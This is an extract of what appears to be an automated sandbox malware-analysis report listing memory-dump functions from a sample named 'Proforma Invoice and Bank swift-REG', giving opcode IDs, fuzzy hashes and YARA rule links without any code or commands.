Instruction Fuzzy Hash: 30518E75A01605DFCB14CFA8C490BAEFBF5FB48350F2086AAD955A7384EB71AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AFEF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: a4aeb52a7ef576358b9b94c5a3d9a72d440837188b45034ae12dbe3b0b13cfdc
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 1751F330A0424D9FDB24CBA8C1C07BEFBB1EF15314F2881B8E64593282D775AE89D741

Uniqueness

Uniqueness Score: -1.00%

Function 00BB740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 564bf4eb11762c99bf676d9131510dcc516411e23d13624893adfb01b432a6c3
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 47519C71640606EFCB25CF14C580AA6BBF5FF95304F1480FAE9089F252E7B1E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B12990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36647cd181246c28380ef4844b555f0dbb9d9efa34043d96d68763e0422f476d
Instruction ID: 512a5982ee6bb9989d8bd221f5a8b23aa070f5ecc1572f819ebbb5a4e7107a41
Opcode Fuzzy Hash: 36647cd181246c28380ef4844b555f0dbb9d9efa34043d96d68763e0422f476d
Instruction Fuzzy Hash: 9A513671A00219AFCF25DF55C980AEEBBB6FF48310F5580A5F814AB261C3359DA2DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B14BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2564e5ec28d9f4295c2a2d53db4e9cde5a96512eed74947d81c46a832de0e50
Instruction ID: 99d60f781aefb2205ffcbb12b8e03d6bbcef37a1555448186011e7b917bebf51
Opcode Fuzzy Hash: a2564e5ec28d9f4295c2a2d53db4e9cde5a96512eed74947d81c46a832de0e50
Instruction Fuzzy Hash: 7441B035A412289BCB21DF68C981FEAB7F4EF49750F4100E9ED08AB241DB74DE85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B14D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34f574555105ecda38be2c33283b2c8592b24a1bb6d77a4f85fed20cde312e7
Instruction ID: 31a4e20d138a975f8200623e14ae5d495dacda1639d59666df58da086412305c
Opcode Fuzzy Hash: d34f574555105ecda38be2c33283b2c8592b24a1bb6d77a4f85fed20cde312e7
Instruction Fuzzy Hash: 0341B371A403189FEB25DF14DC81FA6B7E9FB45710F5400EAE9499B281DB70DD84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AF8A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ee8831f7f780279b65266215fae77ea505028d4208836f91f24dc471df7b28
Instruction ID: 416bae0de9427d99cd42cc48c75fd75609e58b8c4540d14b5bbe79087feae777
Opcode Fuzzy Hash: 74ee8831f7f780279b65266215fae77ea505028d4208836f91f24dc471df7b28
Instruction Fuzzy Hash: 654174B1A4022C9BDB24DF55CC88AB9B7F4FB54340F1145EAE91997252EB749E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BAAA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: f2d9336e3ae549dc50a9a3940d33326ebb021f834f5adaf06a6a79ef76d5cf0d
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 1E31F531F045046BDF159B65C885BBFF7EADF82310F5580A9E805A7291DB749D04C771

Uniqueness

Uniqueness Score: -1.00%

Function 00BAFDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 23512897d282a8bcb0feac9a9755bcd04bfdc6835cb72484a881fd709b3a93fd
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 4A3118327086417FD72297A8C885FBABBE9EB86340F1844F8F4858B752DA75DC41C720

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 4df4193fea4701c3b21a595597d56c4d23dccbe8b2bb3959d1279356a2e2aded
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 95319072608705ABC719DF24C885A6BB7EAFFC1310F04496DF56687645EF34E809CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B669A6, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87484bf526a15682bffbf06638995fc1ca906dca5066817799ae362ae36229a8
Instruction ID: 74e0c27059962e26d5b559c48a61f65a655907e9d3edeed13db3a8d357002309
Opcode Fuzzy Hash: 87484bf526a15682bffbf06638995fc1ca906dca5066817799ae362ae36229a8
Instruction Fuzzy Hash: 9B419AB1E00208AFDB20CFA5D941BFEFBF8EF48714F14816AE918A3251EB349905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AE5210, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16b8df021ba8e2c0b7ccfcfb9048d3b726837aa6892eb6dafb176b5c8f65fad
Instruction ID: a78a3de64054b94d642070b5379b675d58f033828cc9a87f28eda2c0f9d51d45
Opcode Fuzzy Hash: d16b8df021ba8e2c0b7ccfcfb9048d3b726837aa6892eb6dafb176b5c8f65fad
Instruction Fuzzy Hash: D8312A31A51A10EBC722AF64D881BB677F5FF10764F104669FA194B1A1EB30FD04D690

Uniqueness

Uniqueness Score: -1.00%

Function 00B23D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451d5f370487d92870441b5265f3b879c0618223125d97409dc1ae47a1446a89
Instruction ID: 3326b3a6ca57248986b929a03001bdc95b66aeed236a013349aae2dd06515659
Opcode Fuzzy Hash: 451d5f370487d92870441b5265f3b879c0618223125d97409dc1ae47a1446a89
Instruction Fuzzy Hash: 2231B431604524DBC7289F29E481A7ABBF5EF59B40B1580FEE849CB350E738DE40D791

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A61C, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6feaf88aaa7f3153926f638b70085050f8351087857d751ad5891660698f83
Instruction ID: bc59438e3da14a2ddcabe4040c20741c28c61a783879aeea58ff8b8317dc58e8
Opcode Fuzzy Hash: 5d6feaf88aaa7f3153926f638b70085050f8351087857d751ad5891660698f83
Instruction Fuzzy Hash: 63418AB5A01205DFDB14CF58D990BA9BBF1FB49710F2880EAE804AB395D774AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B67016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a3f471bc81c759d0ce88df72fc8e43c61302d033aa3d7907130cb1be8356be
Instruction ID: c63954e297a044c07ad41961c1556d03fc7b3e121d6d006886b27d4bcfcb56c2
Opcode Fuzzy Hash: 02a3f471bc81c759d0ce88df72fc8e43c61302d033aa3d7907130cb1be8356be
Instruction Fuzzy Hash: 2B31C2726087519BC320DF28C941A6AB7E9FF89700F044A69F89997691EB34ED04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B0C182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 7d2452a63c92544663e4a068edbad6bde75600cbd46abc331c8bfc5907bffd8e
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: B531F471A0154AAFD704EBB4C481BE9FFE4FF42304F1442EAE51857382DB346A5ADBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B93D40, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8598e67b01e68c8bf65c468b33de154cc0c7e5e24bdb2a42e2b3c08b4daa6d1a
Instruction ID: cdcc80c4655709efcb65120c6b1fded747dce7c1d4d9f9dbd388bf7efe8d97c7
Opcode Fuzzy Hash: 8598e67b01e68c8bf65c468b33de154cc0c7e5e24bdb2a42e2b3c08b4daa6d1a
Instruction Fuzzy Hash: 35315871509702DFCB10DF54D58185ABBE1FF85B00F0589AEF4889B251E730EE04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A70E, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b02953df7bd301fb31999e467ad59aadee623dddd6a277348e7a0278b49cfb
Instruction ID: 3728c9443d000a75dbcc5a5ec400a15e7cc4e6070b638e293d1701981349eb74
Opcode Fuzzy Hash: a4b02953df7bd301fb31999e467ad59aadee623dddd6a277348e7a0278b49cfb
Instruction Fuzzy Hash: 9131A0B166A2009BD711CB18DCA1FA5BBF9EB85710F54099BE84587290FF70AE41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B161A0, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b87f876d32edc77b18f71f3dfef323595a32cadd15b0077297ee3347a50a07c
Instruction ID: 552e99871e3e859303b96f08d5bb2913b5dd493a10e2738c520c7fd98bdf58b5
Opcode Fuzzy Hash: 9b87f876d32edc77b18f71f3dfef323595a32cadd15b0077297ee3347a50a07c
Instruction Fuzzy Hash: BA317A716097019FD320CF19C940B66B7E5FB88B00F5549EDE9989B351EBB0EC48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AEAA16, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6afedaad54a3c32d6ef2da3720026b792204937668a6c80bae3b413f284e2802
Instruction ID: ee6f6fa8ce196cf86b7f1d29d27df76891bcbc9b47090a0c9b76469fedbed00f
Opcode Fuzzy Hash: 6afedaad54a3c32d6ef2da3720026b792204937668a6c80bae3b413f284e2802
Instruction Fuzzy Hash: D931D471A00619ABCB109F65CD42BBFB7B9EF44700F0144AAF905D7251EB34AE11D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B24A2C, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902fb41acf9f10f50374b292c64654d5dae3dc41b107b1a7d5ebb632bf5af493
Instruction ID: cb23b56e6cc72e310d26b4c7ca67c8f2f2416d2a7cec2059c01ff5cc255d4fbb
Opcode Fuzzy Hash: 902fb41acf9f10f50374b292c64654d5dae3dc41b107b1a7d5ebb632bf5af493
Instruction Fuzzy Hash: 37310232286621DBC7219F54D985B2AFBE4FF82711F1005EAF95A0BA91DB70DC04CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00B28EC7, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8bcb1592e5d0ac971a9e70f91c9ea5764cdbd410812516952011e6a7656951
Instruction ID: fcaae13a7deba3504fb567c261e26697d38386b1dc9aa1538021bc5ef41ad15b
Opcode Fuzzy Hash: cc8bcb1592e5d0ac971a9e70f91c9ea5764cdbd410812516952011e6a7656951
Instruction Fuzzy Hash: 1A41AFB1D012289FDB24CFAAD981AADFBF4FB48310F5041AEE51DA7240EB745A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E730, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d46529de0d547db7390c3ed7c7007d592afcf329a27b782efb86f5da152559
Instruction ID: ae82bf2d58e5b7e1f97e064dd6907b010d19969e3323621e8168a48bd2b6ac63
Opcode Fuzzy Hash: 06d46529de0d547db7390c3ed7c7007d592afcf329a27b782efb86f5da152559
Instruction Fuzzy Hash: 59315C75A14249AFE744CF58D841B9ABBE4FB09314F5482A6FD18CB381E631ED90CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B1BC2C, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4475491740247bf529801b0c3a24c32c0e29f9cb545238be5365e52b9e689f54
Instruction ID: b2a1b674b0f523b5e6333d091cee399a10a7e4228682748924e74f1d66307784
Opcode Fuzzy Hash: 4475491740247bf529801b0c3a24c32c0e29f9cb545238be5365e52b9e689f54
Instruction Fuzzy Hash: C131DF76A026169BCB11DF98D8C1BA6B3E4EB18311F5440FAED44EB201EB74DD858B80

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9100, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc518c33a00f59bec5553bc9c24dfecb9ca7af957387d4383d0455c69e58c81b
Instruction ID: 3a96146bdf593e8664bb7c20ffb2c06a83322d67cade827e5b5222630ce78a72
Opcode Fuzzy Hash: dc518c33a00f59bec5553bc9c24dfecb9ca7af957387d4383d0455c69e58c81b
Instruction Fuzzy Hash: 2131A3B5A01386DFDB65DF6AC488BEEBBF1BB48350F28829AD40467251D770AD80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B11DB5, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: b54f6a35956cfd69e54ccb0f65ede386eda018039aee860f1389a4b6dfafef48
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 5B219C72A00519EFC720CF99CC80EABBBFDEF85780F5144A5FA0197250D630AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B00050, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1c5205bc0d609eb176f1381ba8c579b9e0e2184275481feb38ffb8f8118d39
Instruction ID: 8cc8488025a056d341c5cce2b345e28b52b0844408c863b15e1b1c8b32f37fe6
Opcode Fuzzy Hash: df1c5205bc0d609eb176f1381ba8c579b9e0e2184275481feb38ffb8f8118d39
Instruction Fuzzy Hash: D8318C31211B04CFD725DF28C891BA6B7E5FF89714F1485ADE49A87BA0EB75AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B66C0A, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2917f8ca2c40f92b819454d659da7b4cebefaa74d090dbde196700179495b20d
Instruction ID: b21e535a6f6589718e25d466d3ab8e357f743ab3a21f69557a029c30d674696a
Opcode Fuzzy Hash: 2917f8ca2c40f92b819454d659da7b4cebefaa74d090dbde196700179495b20d
Instruction Fuzzy Hash: A421A0B1A00A44AFC711DB58D840E65B7F8FF48740F1400A9F948D7791EB38ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B290AF, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 77baa03f6bd3a083bfc2b4fdbf68f51d1ba8bd8a779d88d81cf4d63c41f4e11a
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: F6218B71A00219EFDB20DF59D884AAAFBF8EF54350F1488BAE94DA7200D730ED50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B13B7A, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9b4c6b56a4d7db7199d77715e17bd96a88466e66d3b604db0bfa2a8bb37f9f
Instruction ID: 03eeb74299d3e2b1d69b08b3fff93d046bdbe12b4480cc37fe33d4e5247bc64a
Opcode Fuzzy Hash: de9b4c6b56a4d7db7199d77715e17bd96a88466e66d3b604db0bfa2a8bb37f9f
Instruction Fuzzy Hash: 7E217F72A00119EFCB00DF58DD82B5AB7FDFB44748F1500A9E908AB252E771AE458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B66CF0, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcbf9d9d96b1de422c5588afebcb6890cb4bd96c443ab93e945a29bd7eae27f
Instruction ID: c47e7c907c51e8b5078d227eb10069c54634f628df31cd81b03e773246ed05a1
Opcode Fuzzy Hash: 5bcbf9d9d96b1de422c5588afebcb6890cb4bd96c443ab93e945a29bd7eae27f
Instruction Fuzzy Hash: 7C2192B26047459BC711DF69C944BABBBECEF91780F0405F6F940C7292EB38D949C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00BB070D, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 7ebdb9b1a0714870e147e62fd54a31ea6125edb8e0de847f51e7c70e8d02e757
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: FC21F576204204AFD705DF18C884ABBBBE5EFC4750F0486A9F9558B386DB70ED09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AE73, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 79d0dadf666e83bbff1d9d398ec200b33b25dd929093373bf32895bf2913742a
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7321D571606681DFD726DB69C984B267BE8EF45750F2904E0ED048B7E2EB38DC40D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B67794, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1ec5d1dbf4d2c9b68c2fd901fe752bb848bf57f6ff0045b3b21d3588698f70
Instruction ID: 8801b919c5b590d98b2d6a54bff59e44fa6ae07f1e4a4ff1457fe20ce537d1e2
Opcode Fuzzy Hash: 8e1ec5d1dbf4d2c9b68c2fd901fe752bb848bf57f6ff0045b3b21d3588698f70
Instruction Fuzzy Hash: A4219F72944604ABC725DF69D894E6BBBE9EF48740F1005A9F90AC7650EA34ED00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B1FD9B, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 60c45f622a6c94a82809a50ee60ef119160e5f6e56d1f070b34a9dbf9a96114c
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: D7219F72644A42DFC731CF49D680EB6F7E5EB94B10F6481BEE94587621D731AC41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9240, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6300b41d3f3b0626345cc6d1e5d575823d5cac8fd0468418f8be4339fa5b3b11
Instruction ID: 2bc8d37ca12746a4c8fc34adf270e4006bc31a7418f2c2bf31590cd8472a2c0a
